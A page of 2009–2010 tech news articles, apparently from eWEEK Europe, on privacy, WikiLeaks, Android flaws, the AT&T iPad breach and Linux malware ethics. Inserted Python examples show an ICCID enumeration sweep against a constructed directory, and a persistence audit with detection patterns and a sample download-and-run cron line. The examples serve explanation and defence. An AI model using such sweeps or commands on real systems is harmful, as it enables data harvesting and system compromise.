
Facebook’s Zuckerberg Questions Privacy Expectations

  • January 11, 2010
  • By Tom Jowitt

Privacy is no longer a social norm, according to Facebook founder Mark Zuckerberg, commenting on the rise of social networking

Mark Zuckerberg, the founder and chief executive of Facebook, has said that people no longer have an expectation of privacy, thanks to the increasing uptake of social networking.

Speaking at the Crunchie Awards in San Francisco this weekend, the 25-year-old web entrepreneur said: “People have really gotten comfortable not only sharing more information and different kinds but more openly and with more people.”

Zuckerberg went on to add that the rise of social media reflects the changing attitudes among the general public, saying that this radical change has happened in the space of five years.

“When I got started in my dorm room at Harvard, the question a lot of people asked was, ‘why would I want to put any information on the Internet at all? Why would I want to have a website?’,” he said.

“And then in the last 5 or 6 years, blogging has taken off in a huge way and all these different services that have people sharing all this information,” he said.

Facebook is estimated to have over 100 million users in the United States alone, and more than 350 million users worldwide. Zuckerberg’s comments come after the social networking giant recently decided to (somewhat controversially) change the privacy settings of all its users.

In December, Facebook launched a number of new tools which enabled users to control who sees what content on their account, as well as a Transition Tool and simplified privacy settings.

The issue of privacy is a vexed one, especially in the United Kingdom where, late last year, the Home Office pledged to push ahead with controversial plans to monitor all Internet use. Under those plans, communications firms would be required to monitor all Internet use and to retain information on how people use social networks such as Facebook.

Yet the dangers posed by people opening up online to the rest of the world are well known. Back in August, a survey sponsored by British insurance firm Legal & General found that users of social networking sites were giving away vital information about themselves and their whereabouts that was being used by professional burglars to draw up a list of targets. The report, “The Digital Criminal,” found that 38 percent of users of sites such as Facebook and Twitter have posted status updates detailing their holiday plans, and a third of people have posted status updates saying that they are away for the weekend.

Zuckerberg also said it was important for companies such as Facebook to reflect the changing social norms in order to remain relevant and competitive.

“A lot of companies would be trapped by the conventions and their legacies of what they’ve built,” he said. “Doing a privacy change for 350 million users is not the kind of thing that a lot of companies would do.

“But we viewed that as a really important thing, to always keep a beginner’s mind and what would we do if we were starting the company now and we decided that these would be the social norms now and we just went for it.”

Photo credit: Brian Solis / CC-BY


Twitter Fights US Court Demands For WikiLeaks Details

 by Brian Prince

Twitter is fighting a US court’s demand, made in December, for details of WikiLeaks supporters

Micro-blogging site Twitter is opposing an order from a US court to reveal the account details of supporters of WikiLeaks, while WikiLeaks has called on Facebook and Google to reveal whether they also received similar court orders.

As part of the US government’s investigation into WikiLeaks, a court ordered Twitter, in mid-December, to give details of accounts owned by supporters of the whistle-blower site. Twitter has protested against the subpoena and informed the individuals whose account information has been requested, while raising the possibility that other social networking players have received similar orders.

Records required for criminal investigation

The US Department of Justice obtained a subpoena for the micro-blogging site on 14 December, requesting records going back to 1 November 2009 that are “relevant and material to an ongoing criminal investigation.” Among those targeted are WikiLeaks founder Julian Assange, Dutch hacker Rop Gonggrijp (whose name is misspelled in the subpoena) and Bradley Manning, the US Army intelligence analyst suspected of leaking documents to WikiLeaks.

Also named in the subpoena are computer programmer Jacob Appelbaum (identified by his Twitter username, ioerror) and former WikiLeaks volunteer and current Icelandic parliament member Birgitta Jónsdóttir, who wrote the following in a tweet: “just got this: Twitter has received legal process requesting information regarding your Twitter account in (relation to wikileaks).”

Jónsdóttir also tweeted that she plans to oppose the subpoena.

According to a published copy of the court order (PDF), the government is looking for a variety of information, including session times and mailing addresses.

“WikiLeaks strongly condemns this harassment of individuals by the US government,” WikiLeaks said in a statement relayed to Reuters by WikiLeaks attorney Mark Stephens.

The recent WikiLeaks controversy began when the site started publishing a trove of US diplomatic cables in late November. The release of the documents has touched off months of debate and prompted WikiLeaks supporters and opponents alike to air their differences with denial-of-service attacks while businesses such as PayPal cut ties with the whistle-blower site.

In December, Assange was arrested in the UK on charges of sexual assault originating in Sweden. He is currently out on bail.

In its statement, WikiLeaks reportedly said that some of the people named in the subpoena were key figures in helping WikiLeaks make public US military video of a 2007 airstrike that killed Iraqi civilians. WikiLeaks is instructing its lawyers to oppose the subpoena, and is calling on Facebook and Google to disclose whether they received similar subpoenas as well.

A federal judge unsealed the court order on 5 January after Twitter requested the right to inform the people being targeted.

Separately, it was revealed that the US government has taken steps to protect people judged by officials to be in danger because of the document leak. On 7 January, US State Department spokesman P.J. Crowley told the media that the department had helped relocate “a handful of people” identified in the diplomatic documents out of concern for their safety. The CIA has set up a WikiLeaks Task Force (WTF) in response to the leak.

WikiLeaks has denied putting any lives at risk, and the UN has supported its right to publish the leaked material on human rights grounds.

WikiLeaks’ publication of the US cables resulted in a war of denial of service (DoS) attacks, hitting both WikiLeaks itself and the sites of financial institutions such as Mastercard, which withdrew the facility for WikiLeaks supporters to donate money to the whistleblower.


Foodtubes Proposes Underground ‘Physical Internet’

 by Peter Judge

Automatically routed canisters could replace lorries with an Internet of things, says Foodtubes

A group of academics is proposing a system of underground tunnels which could deliver food and other goods in all weathers with massive energy savings.

The Foodtubes group wants to put goods in metal capsules 2m long, which are shifted through underground polyethylene tubes at speeds of up to 60 miles per hour, directed by linear induction motors and routed by intelligent software to their destinations.

The group, which includes an Oxford physics professor and logistics experts, wants £15 million to build a five-mile test circuit, and believes the scheme could fund itself if used by large supermarkets and local councils, and could expand because it uses an open architecture.

Underground tubes and linear motors

“In the long term, we could see an ostrich slaughtered in Cape Town and delivered to Edinburgh,” said Noel Hodson, Foodtubes’ CEO and a project planner.

On a more practical scale, the group has developed a plan for the London borough of Croydon which would link all the food outlets, schools and other major buildings in the borough. “It would cost £400 million to build and, if run by the council or a consortium, it would make £80 million a year,” said Hodson, who says Transport for London has also expressed an interest.

The proposal uses lightweight capsules, which are roughly the same size as the cages that are carried by supermarket lorries, Hodson explained. They are moved by an electromagnetic “kick” from linear induction motors built into the side of the underground tubes and, at junctions, are steered one way or another by other linear motors operating under computer control.

The group moved to linear induction motors, when it realised that vacuum power, normally used in smaller capsule transport systems, would be impractical on this scale.

Energy efficient

The energy savings over road distribution would be huge, since around 92 percent of the diesel burnt by a lorry is used to transport the vehicle itself, which spends much of its time driving around almost empty. As well as this, increasing amounts of the electricity used by the system could come from green sources, said Hodson.

“It’s a difficult project to take forward, as it is innovative and involves new infrastructure,” said Hodson, in something of an understatement. “Governments shudder at getting involved, and research and development funding is scarce.”

However, he believes that a couple of large retailers would be enough to get it off the ground. “We do have communications with a major supermarket group,” he said.

Other members of the team include Fred Taylor, Halley professor of physics at Oxford University, and logistics consultant Jonathan Carter, who lectures at Imperial College London.

The idea could play well with ideas from IBM, which addressed green transport at its Start summit earlier this year, and from HP, which wants to instrument the world with trillions of sensors.

Ironically, however, the first interest may come from companies who stand to suffer if lorries are made obsolete. Foodtubes is talking to two oil firms about providing a system to supply remote stations in the permafrost of Canada, and in the deserts of the Middle East, said Hodson.


John’s Phone Launched for Technophobes

 by Pichayada Promchertchoo

A Dutch company has launched what it calls “the world’s simplest phone”, targeting users who are sick of new-generation models

Only capable of making and receiving calls, John’s Phone is dubbed the world’s simplest mobile phone, specifically designed for anti-smartphone users.

It does not provide any hi-tech features. No apps. No Internet. No camera. No text messaging. All you have to do – in fact, all you can do – is call, talk and hang up.


Named after the company that created it – John Doe, a full-service advertising agency in Amsterdam – the phone is designed for users who are fed up with smartphones and their hi-tech functions.

Its extreme simplicity is designed to appeal to technophobes, the elderly and young kids buying their first phones.

“John’s Phone is easy to use wherever you go. It’s the no-contract cell phone you’ve been waiting for, without any frills or unnecessary features”, the company stated.

Retro Look

In an effort to make it extremely retro, John Doe also provides a small paper-based address book and a pen for storing contacts. They can be slid into the back of the phone.

Other features include a 1200 mAh battery with three weeks stand-by time, a single ringtone, speed dial with enough memory to store ten numbers and a hands-free kit. It is 10.5 x 6 x 1.5 cm and weighs in at 95 grams.

The phone is available in five colours: white, black, brown, greyish-green and pink. The prices range from around £60 to £80.


Europe Holds Cyber-Warfare Test

Cyber Europe 2010 will simulate an attack designed to cut Europe’s nations off from one another

Europe’s cyber security experts are staging a simulated cyber-attack on critical services today, across several EU member states.

The “Cyber Europe 2010” exercise will test Europe’s readiness for an attack which attempts to paralyse online services so that internet connectivity is gradually lost between European countries. It follows the announcement of measures to strengthen and modernise the European Network and Information Security Agency (ENISA) to combat cyber warfare.

Testing links between states

Details of the exercise are being kept under wraps, but ENISA has been at pains to emphasise that this is not an operational test like the US Department of Homeland Security’s Cyber Storm, a series of week-long multi-million dollar tests of America’s attack-readiness.

“Our budget is in the order of hundreds of Euros,” said an ENISA spokesman, adding that the test will not involve critical sectors or industry and will not test response capabilities. Above all, it will not carry the risk of a real network crash: it just tests how well agencies can share information.

By contrast, the US Cyber Storm III exercise, one month ago, was an operational exercise, which included industry and cost millions of dollars, the spokesman said.

During the exercise, through the day, one country after another will face fictitious access problems, and will co-operate on a response, testing their communications in the process. The exercise has been developed since November 2009, and will be followed by more complex scenarios, eventually going all the way to global tests.

“This exercise to test Europe’s preparedness against cyber threats is an important first step towards working together to combat potential online threats to essential infrastructure and ensuring citizens and businesses feel safe and secure online,” said Neelie Kroes, vice president of the European Commission for the Digital Agenda, who is visiting the UK’s cyber-attack centre during the simulation exercise.

The exercise is based on fears that a denial of service attack by hackers could effectively put all major cross-country connections in Europe out of action, making it difficult for businesses and citizens to access services such as eGovernment. In such an attack, the plan is to re-route communications.

Yesterday saw evidence that the fears are well founded. Myanmar (formerly Burma) was virtually cut off from the Internet by a distributed denial of service (DDoS) attack. In the UK, Home Secretary Theresa May has promised increased support for cyber-warfare measures following warnings from the head of GCHQ that Britain faces “credible” cyber-attack threats.


Serious Security Bugs Found In Android Kernel

An analysis of Google Android Froyo’s open-source kernel has uncovered 88 flaws that could expose users’ data

An analysis of the kernel used in Google’s Android smartphone software has turned up 88 high-risk security flaws that could be used to expose users’ personal information, security firm Coverity said in a report published on Tuesday.

The results, published in the 2010 edition of the Coverity Scan Open Source Integrity Report, are based on an analysis of the Froyo kernel used in HTC’s Droid Incredible handset.

Enterprise fears

The results arrive as Android is increasing its market share and increasingly being used in the enterprise.

While Android implementations vary from device to device, Coverity said the same flaws were likely to exist in other handsets as well. Coverity uncovered a total of 359 bugs, about one-quarter of which were classified as high-risk.

The report analysed a total of 61 million lines of open source code from 291 widely used projects, including Apache, Linux, PHP and Samba.

While Android’s density of bugs per thousand lines of code was lower than the average found in open source software overall, it was higher than that of the Linux kernel, according to Coverity. The company said some of the bugs appeared important enough that they should have been addressed before the code was released.

Fixes demanded

Coverity said it will hold off releasing the details of the flaws until January to allow Google and handset vendors to issue fixes. The flaws could be patched via an over-the-air update, Coverity said.

Canalys reported on Monday that Android now dominates the US smartphone market with a 44 percent share, up from 33 percent in the second quarter of this year.

While the deployment of Android on large numbers of handsets has allowed the software to claw market share away from competitors such as RIM, some have criticised Google’s “hands-off” approach for harming the quality of Android and its applications.


Most Consumers Support Government Cyber-Spying

Sixty-three percent of people believe that it is acceptable for their government to spy on another country’s computer systems

Nearly two-thirds of computer users globally believe that it is acceptable for their country to spy on other nations by hacking or installing malware, according to Sophos’s mid-year 2010 Security Threat Report, with 23 percent claiming to support this action even during peacetime.

One in 14 respondents to the survey claimed to believe that crippling distributed denial of service (DDoS) attacks against another country’s communication or financial websites – like the one used to target Russian banks earlier this year – are acceptable during peacetime. Nearly half said such an attack was only acceptable when two countries were at war, and 44 percent said it was never acceptable.


“I think there might be an attitude of all’s fair in love and war,” said Graham Cluley, senior technology consultant at Sophos, speaking to eWEEK Europe. “There’s always been one rule for your country and another rule for your citizens.

“But it goes one stage further when you begin to ask, is it all right to launch attacks against communication systems and financial systems?” he added. “You can imagine the chaos that would ensue if there were organised denial of service attacks on a regular basis, purely to give your country an economic advantage.”

All’s fair in love and war

Cluley believes the attitudes of respondents are largely down to an ingrained cynicism about the role of governments in war. Governments have always spied on each other, and “used every dirty trick in the book” to do so, said Cluley. “Why wouldn’t they use the Internet to do this as well? If it’s your country’s interests at heart, and if they’re protecting your country, then you might think, ‘I don’t really care what they do’.”

Perhaps more surprisingly, 32 percent of respondents to Sophos’s survey said that countries should also be allowed to plant malware and hack into private foreign companies in order to spy for economic advantage.

“It’s kind of curious, because these are the people that have got no time for hackers and the bad guys at all, but seem to think it’s all right for countries to do this,” said Cluley. “I think they need to remember that, one day, it might be a country attacking your company’s network, and trying to infiltrate it, and how are you going to feel about it then?”

Malware-hosting websites

The Security Threat Report also found that the US still hosts the largest share (42.29 percent) of malware-hosting websites. These are websites that have been set up with the intention of infecting visitors, or legitimate websites that have been compromised by hackers. The UK was sixth on the list, with 2.41 percent hosted in this country.

According to Cluley, many of these websites are legitimate ones that have been targeted by hackers. “Businesses could end up infecting their customers, leaving them open to fraud,” he warned. Some hackers also use aggressive search engine optimisation techniques to push infected websites to the top of search results.

This news could be of particular concern given that the UK government recently axed plans for an increase in funding to the Metropolitan Police’s cyber crime unit. With online fraud and other electronic crimes becoming increasingly commonplace, the Police Central e-crime Unit had been hoping for extra funding from the Home Office for training and equipment. However, the extra funding was cut as part of the coalition government’s £6 billion deficit reduction plans.

“There is concern that at the moment the cyber crime authorities are pretty pitifully funded for the level of crime that is going on,” said Cluley. “I think the one thing we can be sure of is that the cyber criminals aren’t cutting their investment in this kind of crime. We are seeing more attacks than ever before. We see 60,000 pieces of new malware every single day, which is simply staggering, but that’s the level of crime that we’re seeing. So companies need to keep on top of this problem.”


iPad Breach Could Heavily Impact Privacy

The AT&T security breach that exposed some Apple iPad owners’ email addresses could help attackers carry out “IMSI catching”

The security breach at AT&T that exposed the email addresses of a reported 114,000 owners of the iPad with Wi-Fi + 3G could potentially impact privacy more than was initially thought.

Two security researchers told eWEEK that the ICCIDs (integrated circuit card identifiers) of iPad owners could be used to determine their IMSIs (International Mobile Subscriber Identities). With an IMSI in hand, it would be easier for an attacker to potentially find the person in an area by using an IMSI catcher to scan for mobile devices.

“You can do this without knowing the IMSIs of people, but you won’t know which IMSI belongs to which user,” explained independent security researcher Nick DePetrillo. “There are other ways to determine that, but knowing ahead of time also helps, like in the case of the AT&T leak.”

ICCIDs provide a route in

A group going by the name Goatse Security was able in the AT&T breach “to guess a large swath of ICCIDs by looking at known iPad 3G ICCIDs … which can also be obtained through friendly associates who own iPads and are willing to share their information, available within the iPad ‘Settings’ application,” according to a Valleywag post by Ryan Tate.

Goatse Security used a script on AT&T’s website to obtain the email addresses. “When provided with an ICCID as part of an HTTP request, the script would return the associated email address,” Tate wrote.

While AT&T said in a statement late on 9 June that the only information that could be derived from the ICCIDs was the email address attached to a particular device, DePetrillo and Don Bailey, a security consultant at iSec Partners, said the iPad information could help attackers launch a technically difficult attack on information that flows over the non-3G portions of the GSM network.

Through IMSI catching, an attacker could potentially intercept control messages or other data that might not be protected by the stronger encryption of the 3G data network. There is no known way to directly compromise or take control of a user’s iPad with this information, however.

“Most US GSM providers encode a unique portion of the International Mobile Subscriber Identity within the ICCID,” Bailey explained. “The IMSI is unique to each subscriber on the GSM network and is considered a protected value … Though the threat of IMSI catching is low, the attack can lead to a loss of personal privacy or an abuse of the victim’s mobile device.”
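How a lookup keyed on the ICCID alone can be swept once a single ICCID is known, and what the ICCID structure Bailey refers to looks like, as an added example: this is not code from the article, from Goatse Security, from the researchers quoted or from AT&T. It models the ITU-T E.118 layout (MII 89, country code, issuer identifier, individual account number, Luhn check digit). The field widths passed to parse_iccid, the sample ICCIDs, the e-mail addresses and the hardened lookup are assumptions made for this example, and the carrier-specific ICCID-to-IMSI mapping Bailey describes is not modeled.

```python
"""ICCID layout and check-digit enumeration (added example, not code from the
article, Goatse Security, the researchers quoted or AT&T).

ITU-T E.118 ICCID: MII "89" (telecommunications), country code, issuer
identifier, individual account number, Luhn check digit. Field widths, the
sample ICCIDs, the e-mail addresses and the hardened lookup are assumptions
made for this example; the carrier-specific ICCID-to-IMSI mapping is not
modeled.
"""
from dataclasses import dataclass


def _luhn_sum(digits: str, double_odd: bool) -> int:
    """Luhn running sum; double_odd selects which positions (from the right) are doubled."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if (i % 2 == 1) == double_odd:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total


def luhn_valid(number: str) -> bool:
    """True if the digit string (check digit included) passes the Luhn mod-10 check."""
    return _luhn_sum(number, double_odd=True) % 10 == 0


def luhn_check_digit(payload: str) -> str:
    """Check digit that makes payload + digit pass luhn_valid."""
    return str((10 - _luhn_sum(payload, double_odd=False) % 10) % 10)


def with_check(body: str) -> str:
    return body + luhn_check_digit(body)


@dataclass(frozen=True)
class Iccid:
    country: str   # ITU E.164 country code (assumed width)
    issuer: str    # issuer (carrier) identifier (assumed width)
    account: str   # individual account identification number
    check: str     # Luhn check digit


def parse_iccid(iccid: str, country_len: int, issuer_len: int) -> Iccid:
    """Split an ICCID into its fields; widths vary by country and issuer,
    so the caller supplies them."""
    if not iccid.isdigit() or not 19 <= len(iccid) <= 20:
        raise ValueError("ICCID must be 19 or 20 digits")
    if not iccid.startswith("89"):
        raise ValueError("ICCID must start with MII 89")
    if not luhn_valid(iccid):
        raise ValueError("Luhn check digit does not match")
    body, split = iccid[2:-1], country_len + issuer_len
    return Iccid(body[:country_len], body[country_len:split], body[split:], iccid[-1])


def neighbouring_iccids(known: str, span: int):
    """ICCIDs whose numeric body lies within +/-span of a known one, each with
    a freshly computed check digit. The account number is the low-order part
    of the body, so stepping the body steps the account number: this is the
    "guess a large swath from known ICCIDs" technique Tate describes."""
    body = known[:-1]
    base, width = int(body), len(body)
    for delta in range(-span, span + 1):
        yield with_check(str(base + delta).zfill(width))


# Constructed subscriber directory standing in for the back end the article
# describes; SIMs issued from one batch tend to carry consecutive numbers.
SAMPLE_BODY = "8901410321111851072"
SAMPLE_ICCID = with_check(SAMPLE_BODY)
DIRECTORY = {
    with_check(str(int(SAMPLE_BODY) + k)): email
    for k, email in {0: "alice@example.com", 1: "bob@example.com",
                     3: "carol@example.com", 7: "dave@example.com"}.items()
}


def lookup_email_weak(iccid: str):
    """The design the article describes: the ICCID alone selects the account."""
    return DIRECTORY.get(iccid)


def lookup_email_hardened(iccid: str, session_iccid):
    """One mitigation (an assumption, not AT&T's fix): the ICCID is a public
    identifier, not a credential, so the lookup only answers for the ICCID
    already bound to an authenticated session."""
    if session_iccid is None or session_iccid != iccid:
        return None
    return DIRECTORY.get(iccid)


def sweep(known: str, span: int, lookup=lookup_email_weak):
    """Harvest every e-mail address the lookup gives up around a known ICCID."""
    hits = {}
    for candidate in neighbouring_iccids(known, span):
        email = lookup(candidate)
        if email is not None:
            hits[candidate] = email
    return hits


if __name__ == "__main__":
    print(parse_iccid(SAMPLE_ICCID, country_len=2, issuer_len=3))
    print(sweep(SAMPLE_ICCID, span=8))                                         # four addresses
    print(sweep(SAMPLE_ICCID, 8, lambda i: lookup_email_hardened(i, None)))   # {}
```

The check digit is the only structure an enumerator has to respect, and because it is computable from the other digits it rules out nothing: every candidate in the sweep is a syntactically valid ICCID, and the hit rate depends only on how densely the issuer allocated that range. Treating the ICCID as a public identifier rather than a credential, as lookup_email_hardened does, is what closes this class of bug; rate limiting alone only slows the sweep down.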

Complex, but worthwhile for an attacker

The technical difficulty of IMSI catching is currently high when trying to manipulate 3G data networks, but may be worthwhile for an attacker due to the high profile of individuals affected by the attack, he said. For now, the capability is limited to a handful of individuals, but anyone with a large enough budget can replicate the technique with varying success, he added.

“The equipment required to execute such an attack is decreasing,” Bailey said. “With the appropriate technical knowledge, an attacker can leverage equipment costing only a few thousand dollars to perform this attack within approximately a square mile of coverage. Traffic from handsets within that coverage area may be redirected through the IMSI catcher, which then may lead to a loss of privacy or an abuse of mobile handsets.”

Bailey suggested that the affected iPad owners consider requesting a new SIM (Subscriber Identity Module) card from AT&T.

DePetrillo said the iPad’s 3G data connection uses stronger encryption than GSM voice, the typical target of IMSI catching. As a result, a man-in-the-middle attack using an advanced IMSI catcher will not get user data in clear text. Still, the researcher said, there is a possibility that an attacker could intercept and manipulate any non-3G data.

“It really comes down to [the fact that] giving any advantages to the attacker, including just unique numbers with names, can help them and that’s never a good thing … For the average consumer, [this is] not that big a deal—the bigger deal is information leakage of your identity and that unique number from AT&T,” DePetrillo said.


Ofcom Lets Small ISPs Off Filesharing Laws

Ofcom plans to exempt small ISPs from the Digital Economy Act’s anti file-sharing measures

Internet Service Providers with fewer than 400,000 customers will be exempt from one of the most onerous sections of the Digital Economy Act, under proposals from Ofcom.

Ofcom has been working on a new code of practice for ISPs that have to deal with copyright infringement claims under the terms of the controversial Digital Economy Act, which was passed into law in early April after only two hours of debate in the House of Commons. The Act requires ISPs to act against users who persistently infringe copyright by sharing files illegally.

Smaller ISPs Are Exempt

Under the new Ofcom proposals, ISPs with fewer than 400,000 subscribers will not have to issue warning letters to customers accused of illegally downloading content.

And it seems that mobile broadband operators will also be exempt, at least for now. Apart from anything else, mobile broadband is set up in a way which makes it much harder to track file-sharers, according to several reports.

It is believed that there are currently only six to eight ISPs with more than 400,000 broadband customers in the UK market, and these large ISPs will be liable to follow the rules set down in the Act.

The reason the large ISPs will have to toe the line while the smaller operators escape the regulations, at least initially, is that Ofcom agrees with the ISPs that they simply have not been given enough time to develop a code for something so complex.

“Due to the short timescales Ofcom has been working to, the Code will be instructional rather than setting out line-by-line what is required,” blogged Trefor Davies, Chief Technology Officer at ISP Timico. “For example, instead of dictating a standard approach for a CIR (Copyright Infringement Report), those affected will have to tell Ofcom how they will go about it and Ofcom will then approve it or recommend changes.”

But Large ISPs Have To Comply

But it seems that the large ISPs, such as TalkTalk, BT and Virgin Media, will have to comply for now, despite opposition from the ISP community.

Late last year, Virgin Media revealed that it was already trialling a tool that could monitor illegal file-sharing over the Internet, although the European Commission said it would investigate the legality of the software.

The first draft of Ofcom’s code is expected to be published in the next few weeks, with a further statement to come in September. The code must then be submitted to the European Commission for approval.

Once it has been given the EC blessing, Ofcom will have to update the Secretary of State with quarterly reports detailing the levels of illegal file-sharing in the UK, as well as the extent of legal action by copyright owners.


Developer Ponders Release of Linux Malware

  • December 1, 2009
  • By Tom Jowitt

The lack of malware on Linux may be about to change after a developer admitted he has developed a ‘package of malware for Unix/Linux’

A developer who claims he is tired of the “Linux is secure” argument has set out to develop a “package of malware for Unix/Linux” in order to help ethical hackers demonstrate the vulnerability of the open-source operating system.

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name of buchner.johannes wrote on Ask Slashdot, in a posting filed by kdawson.

“After a week of work, I finished a package of malware for Unix/Linux,” Johannes wrote. “Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”

Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.

“I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.

Johannes claimed the object of the exercise was to provide a payload so security people can ‘pwn’ systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).

However, he admitted to doubts over how ethical it would be to release the toolkit.

He has concerns that a genuine hacker would rip out the BOINC payload and put “in something really evil”, so that it “could be turned into proper Linux malware.”

“On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.

“Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.
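An audit for the two weaknesses the post above says its payload relies on (persistence planted in cron, bashrc and similar start-up files, and execution of unverified downloads), as an added example: it is not part of the article and not the developer’s package. The indicator patterns are this example’s own assumptions about what such a planted entry tends to look like, and the rc-file, crontab and tarball contents are constructed.

```python
"""Audit for start-up persistence (cron, bashrc and similar files) and for
unverified downloads. Added example, not the developer's package and not
code from the article; file contents and tarball bytes are constructed and
the indicator patterns are this example's own assumptions.
"""
import hashlib
import hmac
import re

# (pattern, reason) pairs applied to each non-comment line of an rc file or crontab.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"),
     "download piped straight into a shell"),
    (re.compile(r"""(^|[\s="'])(/tmp|/var/tmp|/dev/shm)/"""),
     "runs something from a world-writable directory"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"),
     "decodes an embedded payload"),
    (re.compile(r"^@reboot\b"),
     "cron entry that re-runs at every boot"),
]


def audit_startup_text(name: str, text: str):
    """Return (file, line number, reason, line) for every line matching an indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for pattern, reason in INDICATORS:
            if pattern.search(line):
                findings.append((name, lineno, reason, line))
    return findings


def flagged_lines(findings):
    """Set of line numbers that produced at least one finding."""
    return {lineno for _, lineno, _, _ in findings}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_download(data: bytes, trusted_sha256: str) -> bool:
    """Compare a download against a checksum obtained over a trusted channel
    (the check the post says is necessary). Constant-time compare, so the
    result does not leak how many leading hex digits matched."""
    return hmac.compare_digest(sha256_hex(data), trusted_sha256.strip().lower())


# --- constructed sample inputs --------------------------------------------
SAMPLE_BASHRC = (
    "# ~/.bashrc (constructed sample)\n"
    "export PATH=$HOME/bin:$PATH\n"
    "alias ll='ls -l'\n"
    "nohup /tmp/.boinc_client --attach-project http://example.invalid/ >/dev/null 2>&1 &\n"
)
SAMPLE_PROFILE = (
    "# ~/.profile (constructed sample)\n"
    "umask 022\n"
    "eval \"$(echo ZWNobyBoaQ== | base64 -d)\"\n"
)
SAMPLE_CRONTAB = (
    "# constructed sample crontab\n"
    "0 3 * * * /usr/bin/backup.sh\n"
    "*/10 * * * * curl -s http://example.invalid/p.sh | sh\n"
    "@reboot /dev/shm/.x\n"
)
SAMPLE_TARBALL = b"constructed tarball bytes, stands in for a real download"
# Stands in for the checksum published over a channel other than the download itself.
TRUSTED_SHA256 = sha256_hex(SAMPLE_TARBALL)

if __name__ == "__main__":
    for name, text in (("~/.bashrc", SAMPLE_BASHRC), ("~/.profile", SAMPLE_PROFILE),
                       ("crontab", SAMPLE_CRONTAB)):
        for finding in audit_startup_text(name, text):
            print("%s:%d %s: %s" % finding)
    print("download verified:", verify_download(SAMPLE_TARBALL, TRUSTED_SHA256))
    print("tampered download verified:", verify_download(SAMPLE_TARBALL + b"\x00", TRUSTED_SHA256))
```

Run against real files, the audit is a triage aid rather than a verdict: a legitimate @reboot entry or a script that genuinely lives under /tmp will be flagged and has to be judged by hand. The checksum check is only as trustworthy as the channel the checksum came from; a checksum served from the same mirror as the tarball proves nothing, which is the point of the post’s “through trusted channels”.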

There was a mix of opinions on Johannes’s dilemma over releasing the malware. One user by the name of Jeff321 said that he believed Johannes had already decided.

“There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can’t actually release it due to legal issues).”

“You can’t (and won’t) release it now,” he added. “If somebody gets attacked with your code, guess who they’re going to prosecute and/or sue.”

Another user, by the name of sopssa, also waded in. “The summary says it doesn’t actually do anything malicious and it isn’t a worm. There is no legal reason why he couldn’t release the code and/or a paper about it,” said sopssa.

“The thing is, it’s stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time because they’ve heard so from lots of other Linux users. It’s better to show people that it is actually possible, and maybe it leads to better-secured systems too.”